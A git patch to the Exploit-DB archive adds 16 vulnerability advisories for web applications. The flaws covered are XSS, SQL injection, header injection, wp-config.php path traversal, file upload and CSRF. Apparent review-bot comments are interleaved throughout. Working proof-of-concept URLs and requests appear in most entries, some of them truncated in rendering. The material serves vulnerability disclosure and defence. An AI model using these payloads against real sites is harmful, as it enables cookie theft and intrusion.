From c22dc8c9d46d54a202e6d8379833c3b881b82371 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 25 Jul 2015 05:02:16 +0000 Subject: [PATCH] DB: 2015-07-25 16 new exploits
--- files.csv | 18 +- platforms/asp/webapps/37678.txt | 13 ++ platforms/asp/webapps/37689.txt | 27 +++ platforms/multiple/webapps/37662.txt | 173 ++++++++++++++++++ platforms/multiple/webapps/37686.txt | 250 +++++++++++++++++++++++++++ platforms/php/remote/37688.txt | 14 ++ platforms/php/webapps/37622.txt | 32 ++++ platforms/php/webapps/37659.txt | 30 ++++ platforms/php/webapps/37679.txt | 13 ++ platforms/php/webapps/37680.txt | 9 + platforms/php/webapps/37681.txt | 9 + platforms/php/webapps/37682.txt | 7 + platforms/php/webapps/37683.txt | 9 + platforms/php/webapps/37684.html | 7 + platforms/php/webapps/37687.txt | 9 + platforms/php/webapps/37690.txt | 7 + platforms/xml/webapps/37685.txt | 14 ++ 17 files changed, 640 insertions(+), 1 deletion(-) create mode 100755 platforms/asp/webapps/37678.txt create mode 100755 platforms/asp/webapps/37689.txt create mode 100755 platforms/multiple/webapps/37662.txt create mode 100755 platforms/multiple/webapps/37686.txt create mode 100755 platforms/php/remote/37688.txt create mode 100755 platforms/php/webapps/37622.txt create mode 100755 platforms/php/webapps/37659.txt create mode 100755 platforms/php/webapps/37679.txt create mode 100755 platforms/php/webapps/37680.txt create mode 100755 platforms/php/webapps/37681.txt create mode 100755 platforms/php/webapps/37682.txt create mode 100755 platforms/php/webapps/37683.txt create mode 100755 platforms/php/webapps/37684.html create mode 100755 platforms/php/webapps/37687.txt create mode 100755 platforms/php/webapps/37690.txt create mode 100755 platforms/xml/webapps/37685.txt
diff --git a/files.csv b/files.csv
index 68d36dbc7..b4a72db27 100755
--- a/files.csv
+++ b/files.csv
@@ -10665,7 +10665,7 @@ id,file,description,date,author,platform,type,port
 11657,platforms/php/webapps/11657.txt,"Chaton <= 1.5.2 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0
 11660,platforms/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,php,webapps,0
 11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
-11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
+11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
 11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver <= 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0
 11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0
 11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent 1.0 - SQL Injection Vulnerability (id)",2010-03-09,kaMtiEz,php,webapps,0
@@ -33945,6 +33945,7 @@ id,file,description,date,author,platform,type,port
 37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80
 37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80
 37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80
+37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS",2015-07-16,"Filippos Mastrogiannis",php,webapps,0
 37607,platforms/windows/dos/37607.py,"Internet Download Manager - (.ief) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
 37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
 37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0
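Review bot: The added 37622 row sits between 37604 and 37607, so the id column stops being monotonic in this stretch; the next hunk does the same, placing 37688 and 37659 ahead of 37660 and 37662 after it. Its date 2015-07-16 also falls between neighbours dated 2015-07-13 and 2015-07-14, so the placement is neither id order nor date order. If the index is meant to be sorted by id, the row should be moved to its sorted position; otherwise it would help to state in the file's header or the contributor notes what order rows are kept in, so the next editor does not "fix" it.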
@@ -33992,7 +33993,10 @@ id,file,description,date,author,platform,type,port
 37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0
 37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Include Vulnerability",2012-08-23,"Corrado Liotta",php,webapps,0
 37657,platforms/windows/local/37657.txt,"Microsoft Word Local Machine Zone Remote Code Execution Vulnerability",2015-07-20,"Eduardo Braun Prado",windows,local,0
+37688,platforms/php/remote/37688.txt,"PHP 'header()' HTTP Header Injection Vulnerability",2011-10-06,"Mr. Tokumaru",php,remote,0
+37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 Stored XSS",2015-07-20,"Filippos Mastrogiannis",php,webapps,0
 37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash Proof Of Concept",2015-07-20,"Reza Espargham",ios,dos,0
+37662,platforms/multiple/webapps/37662.txt,"Airdroid iOS_ Android & Win 3.1.3 - Persistent Vulnerability",2015-07-20,Vulnerability-Lab,multiple,webapps,0
 37663,platforms/linux/dos/37663.txt,"TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0
 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,metasploit,java,remote,0
@@ -34006,3 +34010,15 @@ id,file,description,date,author,platform,type,port
 37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component 'cid' Parameter SQL Injection Vulnerability",2012-08-27,Crim3R,php,webapps,0
 37676,platforms/asp/webapps/37676.txt,"Power-eCommerce Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0
 37677,platforms/php/webapps/37677.txt,"Wordpress Finder 'order' Parameter Cross Site Scripting Vulnerability",2012-08-25,Crim3R,php,webapps,0
+37678,platforms/asp/webapps/37678.txt,"Web Wiz Forums Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0
+37679,platforms/php/webapps/37679.txt,"LibGuides Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps,0
+37680,platforms/php/webapps/37680.txt,"Mihalism Multi Host 'users.php' Cross Site Scripting Vulnerability",2012-08-25,Explo!ter,php,webapps,0
+37681,platforms/php/webapps/37681.txt,"WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure Vulnerability",2012-08-28,"Jan Van Niekerk",php,webapps,0
+37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin Arbitrary File Upload Vulnerability",2012-08-28,"Iranian Dark Coders",php,webapps,0
+37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
+37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
+37685,platforms/xml/webapps/37685.txt,"squidGuard 1.4 Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,webapps,0
+37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,"John Page",multiple,webapps,0
+37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0
+37689,platforms/asp/webapps/37689.txt,"XM Forum 
'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0
+37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0
diff --git a/platforms/asp/webapps/37678.txt b/platforms/asp/webapps/37678.txt
new file mode 100755
index 000000000..2d5fb7515
--- /dev/null
+++ b/platforms/asp/webapps/37678.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/55220/info
+
+Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Web Wiz Forums 10.03 is vulnerable; other versions may also be affected.
+
+http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
+
+http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
+
+http://www.www.example.com/post_message_form.asp?ForumID=63&mode=new&PagePosition=0&ReturnPage=Thread&ThreadPage=">&TopicID=57676
\ No newline at end of file
diff --git a/platforms/asp/webapps/37689.txt b/platforms/asp/webapps/37689.txt
new file mode 100755
index 000000000..8b1e17b6b
--- /dev/null
+++ b/platforms/asp/webapps/37689.txt
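Review bot: The quoted description of the added 37689 row appears to break across a line between `XM Forum ` and `'search.asp' SQL Injection Vulnerability`; if that is a literal newline inside the quoted field rather than a rendering artefact, line-oriented consumers of files.csv (grep, shell loops, split-on-newline readers) will see a truncated row followed by an orphan fragment. The row should be a single line: `37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0`. Separately, the 37687 description here names `example_form.ajax.php` while the advisory body in 37687.txt uses `example_from.ajax.php`; one of the two is a typo and the index should agree with the file it points at.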
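Review bot: The third PoC URL in 37678.txt has a doubled host label, `http://www.www.example.com/post_message_form.asp?...`, which should be `http://www.example.com/...`, and the first two PoC URLs are byte-identical, so one of them is presumably a copy-paste slip for a different parameter or page. 37679.txt in a later hunk has the same problem with three identical `cat.php?cid=` lines. The `ThreadPage=">` value on the last line also looks truncated, probably lost in rendering; if the committed file reads the same, that PoC is incomplete. De-duplicating the URLs, or labelling which parameter each one exercises, would make the advisory usable as written.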
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/55299/info
+
+XM Forum is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+P0C :
+HTTP HEADERS :
+Host: www.example.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer: http://www.example.com/chilli_forum/search.asp
+Cookie: TrackID=%7B54A35316%2D7519%2D405D%2D950A%2DA8CF50497150%7D; ASPSESSIONIDASSRDDBT=LPENAGHCNMNGMAOLEAJFMFOA
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 46
+Post Data --------------------
+terms=%27&stype=1&in=1&forum=-1&ndays=0&mname=
+
+Http response :
+
+28 Microsoft OLE DB Provider for SQL Server 8 21 error ' 8 80040e14 8 ' 1f
+
+84 Unclosed quotation mark after the character string ') ORDER BY tbl_Categories.cOrder, tbl_Forums.fOrder, tbl_Topics.tLastPostDate'. 7 1f
+
diff --git a/platforms/multiple/webapps/37662.txt b/platforms/multiple/webapps/37662.txt
new file mode 100755
index 000000000..9366aa187
--- /dev/null
+++ b/platforms/multiple/webapps/37662.txt
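Review bot: The captured request in 37689.txt publishes a live `Cookie:` header, `TrackID=...; ASPSESSIONIDASSRDDBT=LPENAGHCNMNGMAOLEAJFMFOA`, which is the tester's own session identifier and is not needed to reproduce the injection; it should be reduced to `Cookie: [REDACTED]` before the file is committed. The `Http response :` block looks like a raw chunked-encoded body (the `28`, `8`, `21`, `1f` tokens read as chunk sizes), which buries the actual OLE DB error text; quoting only the `Unclosed quotation mark ...` line would be clearer. `P0C :` should read `PoC:`, and the advisory names no affected or fixed XM Forum version, so an operator cannot tell whether a given install is exposed.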
@@ -0,0 +1,173 @@
+Document Title:
+===============
+Airdroid iOS, Android & Win 3.1.3 - Persistent Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1543
+
+
+Release Date:
+=============
+2015-07-20
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1543
+
+
+Common Vulnerability Scoring System:
+====================================
+3.9
+
+
+Product & Service Introduction:
+===============================
+AirDroid allows you to access wirelessly and for free on your Android phone or tablet from Windows, Mac or the Internet, and to control it.
+
+(Copy of the Product Homepage: https://www.airdroid.com/de/ )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Core Research Team discovered an application-side input validation web vulnerability in the official SandStudio AirDroid (windows, ios and android) mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-07-05: Researcher Notification & Coordination (Hadji Samir)
+2015-07-06: Vendor Notification (Security Team)
+2015-07-20: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Sand Studio
+Product: AirDroid iOS Application (Andoird, Windows, MacOS & Web) 3.1.3
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in the official SandStudio AirDroid (windows, ios and android) mobile web-application.
+The vulnerability allows remote attacker or low privilege user accounts to inject malicious codes to the application-side of the affected mobile web-application.
+ +The vulnerability is located in the send messages and the send message with an attached file module. Remote attackers with low privilege user account are able to upload file name +with malicious strings like ``> + + + + +
+ + + + + +
+ + + + +
+ + + +
+ + + +
+ + + +
+ + + +
+ + + +
+ + + + + +Whitelist MD5 malware IDs CSRF: +------------------------------- + +In final CSRF POC to try an white list malware MD5 IDs will be a bit more +complex, +we need to submit form many times hidden in background using iframe so we +stay on same page. +Seems all MD5 ID's end in 0001 and are 8 bytes in length, we just need a +loop an create some +numbers 8 bytes long and dynamically assign the 'id' value of the field and +execute multiple +POST requests in background, it will be hit or miss unless you know ahead +of time the MD5 ID +in the database your targeting. + +e.g. Malware MD5 database ID 28240001 + +So Here we go!... + + + + + + +CSRF POC hyp3rlinx + + + +
+
+
+
+
+
+
+
+
+
+Disclosure Timeline:
+=========================================================
+Vendor Notification: June 30, 2015
+July 24, 2015 : Public Disclosure
+
+
+
+Severity Level:
+=========================================================
+High
+
+
+
+Description:
+==========================================================
+
+Request Method(s): [+] POST
+
+
+Vulnerable Product: [+] Hawkeye-G v3.0.1.4912
+
+
+Vulnerable Parameter(s): [+] name, enable, id
+
+
+Affected Area(s): [+] Network Threat Appliance, Local Domain
+
+
+============================================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+
+(hyp3rlinx)
diff --git a/platforms/php/remote/37688.txt b/platforms/php/remote/37688.txt
new file mode 100755
index 000000000..0c77c15cd
--- /dev/null
+++ b/platforms/php/remote/37688.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/55297/info
+
+PHP is prone to a vulnerability that allows attackers to inject arbitrary headers through a URL.
+
+By inserting arbitrary headers, attackers may be able to launch cross-site request-forgery, cross-site scripting, HTML-injection, and other attacks.
+
+PHP 5.1.2 is vulnerable; other versions may also be affected.
+
+
+
+http://www.example.com/head1.php?url=http://example.com/head1.php%0DSet-Cookie:+NAME=foo
\ No newline at end of file
diff --git a/platforms/php/webapps/37622.txt b/platforms/php/webapps/37622.txt
new file mode 100755
index 000000000..9256b36bd
--- /dev/null
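Review bot: 37688.txt states `PHP 5.1.2 is vulnerable; other versions may also be affected.` but names no fixed release, and the `head1.php` the PoC URL points at is not shown, so a reader cannot tell what the script does with its `url` parameter (presumably it hands it to `header()`, given the title; confirm against the original report). The hunk header counts 14 lines but only 11 are visible here, so the script may have been lost in rendering rather than omitted from the commit. Adding a line such as `Fixed in: PHP <version per vendor changelog>` and a one-sentence description of head1.php would make the entry self-contained.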
+++ b/platforms/php/webapps/37622.txt
@@ -0,0 +1,32 @@
+# WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS
+
+# Vendor Homepage: http://www.wpdownloadmanager.com
+# Software Link: https://wordpress.org/plugins/download-manager
+# Affected Versions: Free 2.7.94 & Pro 4
+# Tested on: WordPress 4.2.2
+
+# Discovered by Filippos Mastrogiannis
+# Twitter: @filipposmastro
+# LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177
+
+-- Description --
+
+This stored XSS vulnerability allows any authenticated wordpress user
+to inject malicious code via the name of the uploaded file:
+e.g. .jpg
+
+The vulnerability exists because the file name is not properly sanitized
+and this can lead to malicious code injection that will be executed on the
+target=3DE2=3D80=3D99s browser
+
+-- Proof of Concept --
+
+1. The attacker creates a new download package via the plugin's menu
+and uploads a file with the name: .jpg
+
+2. The stored XSS can be triggered when an authenticated user (e.g. admin)
+attempts to edit this download package
+
+-- Solution --
+
+Upgrade to the latest version
\ No newline at end of file
diff --git a/platforms/php/webapps/37659.txt b/platforms/php/webapps/37659.txt
new file mode 100755
index 000000000..52758e4b9
--- /dev/null
+++ b/platforms/php/webapps/37659.txt
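Review bot: Line 20 of 37622.txt reads `target=3DE2=3D80=3D99s browser`, a quoted-printable leftover from a mail transfer (`=E2=80=99` is the curly apostrophe, with its `=` signs re-encoded as `=3D`); it should read `target's browser`, as the sibling advisory 37659.txt already does. The example file names on the `e.g. .jpg` and `uploads a file with the name: .jpg` lines are empty here — presumably the injected markup was dropped in rendering, but if the committed file also lacks it the PoC is not reproducible from the text. `Upgrade to the latest version` under Solution should name the first fixed release, e.g. `Fixed in: <version per vendor changelog>`, since "latest" stops being meaningful the moment the next release ships.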
@@ -0,0 +1,30 @@
+# phpVibe < 4.20 Stored XSS
+
+# Vendor Homepage: http://www.phpvibe.com
+# Affected Versions: prior to 4.20
+
+# Discovered by Filippos Mastrogiannis
+# Twitter: @filipposmastro
+# LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177
+
+-- Description --
+
+This stored XSS vulnerability allows any logged in user
+to inject malicious code in the comments section:
+e.g. ">
+
+The vulnerability exists because the user input is not properly sanitized
+and this can lead to malicious code injection that will be executed on the
+target’s browser
+
+-- Proof of Concept --
+
+1. The attacker posts a new comment which contains our payload:
+">
+
+2. The stored XSS can be triggered when any user visits the link of the
+uploaded content
+
+-- Solution --
+
+The vendor has fixed the issue in the version 4.21
diff --git a/platforms/php/webapps/37679.txt b/platforms/php/webapps/37679.txt
new file mode 100755
index 000000000..609d60ddc
--- /dev/null
+++ b/platforms/php/webapps/37679.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/55222/info
+
+LibGuides is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
+
+http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
+
+http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
+
+http://www.example.com/mobile.php?action=8&gid=&iid=145&search=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37680.txt b/platforms/php/webapps/37680.txt
new file mode 100755
index 000000000..13b372a56
--- /dev/null
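Review bot: The title `# phpVibe < 4.20 Stored XSS` and `# Affected Versions: prior to 4.20` in 37659.txt disagree with the Solution line `The vendor has fixed the issue in the version 4.21`: if 4.21 is the first fixed release then 4.20 itself is affected and the range should be `prior to 4.21` (with the files.csv description `phpVibe < 4.20 Stored XSS` corrected to match); if 4.20 was verified clean, the text should say so. The payload lines `e.g. ">` and `">` are clearly truncated here — likely the injected markup was lost in rendering — so the committed file should be checked; as shown, the PoC cannot be reproduced from the text alone.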
+++ b/platforms/php/webapps/37680.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55237/info
+
+Mihalism Multi Host is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Mihalism Multi Host 5.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/users.php?act=register&return=/>
\ No newline at end of file
diff --git a/platforms/php/webapps/37681.txt b/platforms/php/webapps/37681.txt
new file mode 100755
index 000000000..facd8174a
--- /dev/null
+++ b/platforms/php/webapps/37681.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55241/info
+
+The Cloudsafe365 plugin for WordPress is prone to a file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view local files in the context of the web server process. This may aid in further attacks.
+
+http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
+
+http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php
\ No newline at end of file
diff --git a/platforms/php/webapps/37682.txt b/platforms/php/webapps/37682.txt
new file mode 100755
index 000000000..ec7074b3b
--- /dev/null
+++ b/platforms/php/webapps/37682.txt
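Review bot: 37681.txt gives no affected or fixed Cloudsafe365 plugin version, so an operator cannot tell whether an installed copy is exposed. The impact sentence `view local files in the context of the web server process. This may aid in further attacks.` also undersells the PoC, whose first URL reads `wp-config.php`: that file holds the database credentials and the authentication salts, so a site that finds this `cs365_edit.php?file=` pattern in its access logs needs to rotate both, not just update the plugin. A line such as `Affected: cloudsafe365-for-wp <version> (fixed in <version>)` and one sentence on credential rotation would make the entry actionable for defenders.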
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55243/info
+
+The Simple:Press Forum plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+http://www.example.com/wp/wp-content/plugins/simple-forum/forum/uploader/sf-uploader.php?id=4&folder=uploads/forum/petas
\ No newline at end of file
diff --git a/platforms/php/webapps/37683.txt b/platforms/php/webapps/37683.txt
new file mode 100755
index 000000000..35886b634
--- /dev/null
+++ b/platforms/php/webapps/37683.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55275/info
+
+Phorum is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Phorum 5.2.18 is vulnerable; other versions may also be affected.
+
+http://www.example.com/control.php?0,panel=groupmod,group=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37684.html b/platforms/php/webapps/37684.html
new file mode 100755
index 000000000..ef1c42070
--- /dev/null
+++ b/platforms/php/webapps/37684.html
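Review bot: 37682.txt names neither an affected nor a fixed Simple:Press version (`The Simple:Press Forum plugin is prone to ...`), and the single PoC URL shows only the `id` and `folder` query parameters of `sf-uploader.php`, not the request that performs the upload, so the text can be used neither to confirm exposure nor to write a detection. At minimum the file should carry an `Affected versions:` line (value from the vendor or the BID report it cites) and say which request the URL belongs to; the `folder=uploads/forum/petas` value reads like a tester's artefact and should be replaced with a neutral placeholder.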
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55280/info
+
+PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
\ No newline at end of file
diff --git a/platforms/php/webapps/37687.txt b/platforms/php/webapps/37687.txt
new file mode 100755
index 000000000..84ec0453d
--- /dev/null
+++ b/platforms/php/webapps/37687.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55295/info
+
+TomatoCart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+TomatoCart 1.1.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/with/tomato/ext/secureimage/example_from.ajax.php/">
\ No newline at end of file
diff --git a/platforms/php/webapps/37690.txt b/platforms/php/webapps/37690.txt
new file mode 100755
index 000000000..cfbff87ed
--- /dev/null
+++ b/platforms/php/webapps/37690.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55315/info
+
+Crowbar is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/utils?waiting=true&file=foo'%3B})% 3B}alert(document.cookie)
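Review bot: The PoC URL in 37687.txt targets `example_from.ajax.php`, while the files.csv description added in this same commit calls the script `example_form.ajax.php`; one of the two is a transposition typo, and the index entry and the advisory should agree (the TomatoCart source tree would settle which spelling is real). The payload after `example_from.ajax.php/` is reduced to `">`, so the injected markup was presumably lost in rendering; if the committed file also lacks it the PoC is unusable as written.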
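Review bot: The PoC in 37690.txt contains `% 3B` with a space inside a percent-escape (`foo'%3B})% 3B}alert(document.cookie)`), which no URL decoder will treat as an escape — most likely a line-wrap artefact from the original mail, so the line should be checked against the BID source before it is committed. The description also says `multiple cross-site scripting vulnerabilities` but lists a single `file` parameter on `/utils` and names no Crowbar version; the other affected parameters should be listed or the wording reduced to one issue, and an `Affected versions:` line added so the entry can be matched against a deployment.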